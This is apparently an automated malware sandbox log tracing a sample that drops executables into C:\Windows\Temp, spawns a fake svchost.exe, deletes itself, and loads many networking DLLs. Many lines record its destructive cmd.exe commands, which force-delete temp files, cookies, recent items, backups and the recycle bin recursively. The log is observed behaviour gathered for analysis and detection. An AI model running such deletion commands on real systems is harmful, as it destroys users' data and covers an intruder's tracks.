Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\server.exe Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\033726\svchost.exe Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: aclayers.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: sfc.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Temp\v5.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\v5.exe Section loaded: acgenral.dll
Source: C:\Windows\Temp\v5.exe Section loaded: uxtheme.dll
Source: C:\Windows\Temp\v5.exe Section loaded: winmm.dll
Source: C:\Windows\Temp\v5.exe Section loaded: samcli.dll
Source: C:\Windows\Temp\v5.exe Section loaded: msacm32.dll
Source: C:\Windows\Temp\v5.exe Section loaded: version.dll
Source: C:\Windows\Temp\v5.exe Section loaded: userenv.dll
Source: C:\Windows\Temp\v5.exe Section loaded: dwmapi.dll
Source: C:\Windows\Temp\v5.exe Section loaded: urlmon.dll
Source: C:\Windows\Temp\v5.exe Section loaded: mpr.dll
Source: C:\Windows\Temp\v5.exe Section loaded: sspicli.dll
Source: C:\Windows\Temp\v5.exe Section loaded: winmmbase.dll
Source: C:\Windows\Temp\v5.exe Section loaded: winmmbase.dll
Source: C:\Windows\Temp\v5.exe Section loaded: iertutil.dll
Source: C:\Windows\Temp\v5.exe Section loaded: srvcli.dll
Source: C:\Windows\Temp\v5.exe Section loaded: netutils.dll
Source: C:\Windows\Temp\v5.exe Section loaded: aclayers.dll
Source: C:\Windows\Temp\v5.exe Section loaded: sfc.dll
Source: C:\Windows\Temp\v5.exe Section loaded: sfc_os.dll
Source: C:\Windows\Temp\v5.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\v5.exe Section loaded: windows.storage.dll
Source: C:\Windows\Temp\v5.exe Section loaded: wldp.dll
Source: C:\Windows\Temp\v5.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\v5.exe Section loaded: propsys.dll
Source: C:\Windows\Temp\v5.exe Section loaded: profapi.dll
Source: C:\Windows\Temp\v5.exe Section loaded: edputil.dll
Source: C:\Windows\Temp\v5.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Temp\v5.exe Section loaded: wintypes.dll
Source: C:\Windows\Temp\v5.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: msvcp60.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\Temp\server.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: drprov.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ntlanman.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: davclnt.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: davhlpr.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: hra33.dll Jump to behavior
Source: C:\Windows\Temp\v5.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: oledlg.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ieproxy.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: profext.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\Temp\ .exe Section loaded: msvcp110_win.dll Jump to behavior
